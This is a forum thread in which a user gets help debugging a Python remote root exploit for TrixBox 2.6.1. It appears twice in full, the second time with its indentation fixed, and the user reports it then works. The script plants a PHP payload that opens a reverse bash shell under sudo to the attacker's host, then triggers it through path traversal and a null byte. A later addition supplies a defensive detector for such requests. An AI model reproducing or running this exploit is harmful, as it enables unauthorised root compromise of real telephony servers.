Topic: Python error - TypeError: cannot concatenate 'str' and 'NoneType' objects

pl4f0rd

I have an error in the code below and I'm not sure why. I'm guessing it has something to do with the def find_sessionid part.

Any help would be greatly appreciated.

Error below:

Code:
   tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
TypeError: cannot concatenate 'str' and 'NoneType' objects


Code:
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep
 
print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")
 
if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)
 
host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])
 
 
def create_post(injection):
        buffer=("POST /user/index.php HTTP/1.1 \r\n"
        "Host: 192.168.219.132 \r\n"
        "Content-Type: application/x-www-form-urlencoded \r\n"
        "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
        return buffer
 
def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output
 
def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
            if re.search("Set-Cookie",header):
                    cook=header.split(" ")
            sessionid=cook[1][10:42]
                    print "[*] Session ID is %s" % sessionid
            return sessionid
 
 
print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)
 
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
 
print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)
 
print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
send_post(host,port,cleanup)
print "[*] Done!"
 
# milw0rm.com [2008-07-12]

The greatest lesson in life is to know that even fools are right sometimes

Kulverstukas

The error means that variable 'id' does not have a value, and in Python everything is an object. So when a variable is created it turns into an object, and type 'None' is always returned even when nothing should be returned. So I'm guessing that 'id' does not receive a session ID in this line:
Code:
print "[*] Extracting Session ID"
id=find_sessionid(raw_session)
Therefore 'id' is None, and line:
Code:
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
tries to concat a string with an object 'None'.

Conclusion: exploit does not work because it does not receive the Session ID.

pl4f0rd

So you got any ideas on how I can get the session?

Kulverstukas

Try it on other versions...?

pl4f0rd

Well, it's deffo running the right version (see screenshot), so there must be a way to get this code to work somehow.

10n1z3d

The indentation on that line looks fucked up. Try this one:

Code:
#!/usr/bin/python
import sys
from socket import *
import re
import os
from time import sleep

print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!\r\n"
"[*] TrixBox 2.6.1 langChoice remote root exploit \r\n"
"[*] http://www.offensive-security.com/0day/trixbox.py.txt\r\n")

if (len(sys.argv)!=5):
    print "[*] Usage: %s <rhost> <rport> <lhost> <lport>" % sys.argv[0]
    exit(0)

host=sys.argv[1]
port=int(sys.argv[2])
lhost=sys.argv[3]
lport=int(sys.argv[4])


def create_post(injection):
    buffer=("POST /user/index.php HTTP/1.1 \r\n"
    "Host: 192.168.219.132 \r\n"
    "Content-Type: application/x-www-form-urlencoded \r\n"
    "Content-Length: "+str(len(injection))+"\r\n\r\n" +injection)
    return buffer

def send_post(host,port,input):
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, port))
    s.send(input)
    output=s.recv(1024)
    s.close()
    return output

def find_sessionid(http_output):
    headers=re.split("\n",http_output)
    for header in headers:
        if re.search("Set-Cookie",header):
            cook=header.split(" ")
            sessionid=cook[1][10:42]
            print "[*] Session ID is %s" % sessionid
            return sessionid


print "[*] Injecting reverse shell into session file"
bash_inject="langChoice=<?php shell_exec(\"sudo /bin/bash 0</dev/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260\");?>"
reverse=create_post(bash_inject)
raw_session=send_post(host,port,reverse)

print "[*] Extracting Session ID"
id=find_sessionid(raw_session)

print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport)
sleep(3)
print "[*] Skadush! \r\n[*] Ctrl+C to exit reverse shell."
tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00')
send_post(host,port,tmpsession)

print "[*] Cleaning up"
cleanup=create_post('langChoice=english')
send_post(host,port,cleanup)
#send_post(host,port,cleanup) # sending same shit twice? doesnt look right. GTFO!
print "[*] Done!"

I have also commented out line 64 which seems useless to me.
« Last Edit: July 14, 2011, 09:21:03 pm by 10n1z3d »
Code:
python -c "print ''.join(chr(x) for x in [int(oct(39)) + 2, 24 * 2, 313 % 203, 0x31, (2 ** 7) - 6, int('051'), (3 << 6) - 92])"
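
A defender-side check for the requests the script above sends, added here as an example and not part of the original thread: it flags POSTs to /user/index.php whose langChoice value contains traversal sequences, a null byte or a PHP open tag, including double-encoded forms. The function names, the allowlist pattern, the host pbx.example and the sample bodies are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Assumption: legitimate language names are short plain tokens such as "english".
ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,32}")
CHECKS = [("path-traversal", re.compile(r"\.\.[/\\]")),
          ("null-byte", re.compile(r"\x00")),
          ("php-tag", re.compile(r"<\?"))]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_body(body, param="langChoice"):
    """Return the reasons a urlencoded body is suspicious; [] means clean."""
    reasons = []
    for pair in body.split("&"):
        key, _, raw = pair.partition("=")
        if unquote_plus(key) != param:
            continue
        value = fully_decode(raw)
        hits = [name for name, rx in CHECKS if rx.search(value)]
        if not ALLOWED.fullmatch(value):
            hits.append("not-allowlisted")
        reasons += [h for h in hits if h not in reasons]
    return reasons

def inspect_request(raw_request):
    """Check one raw HTTP request; only POSTs to /user/index.php are examined."""
    head, _, body = raw_request.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    if len(parts) < 2 or parts[0] != "POST" or parts[1].split("?")[0] != "/user/index.php":
        return []
    return classify_body(body)

# Constructed sample requests (not captured traffic).
REQ = "POST /user/index.php HTTP/1.1\r\nHost: pbx.example\r\n\r\n%s"
SAMPLES = ["langChoice=english",
           "langChoice=../../../../tmp/sess_0123456789abcdef0123456789abcdef%00",
           "langChoice=%252e%252e%252ftmp%252fx",
           "langChoice=<?php echo 1;?>"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(REQ % sample), sample)
```

The same allowlist, applied server-side before the value is used to build a file path, is the mitigation counterpart of this detection.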

pl4f0rd

Great ;D

Works like a charm.

Thanks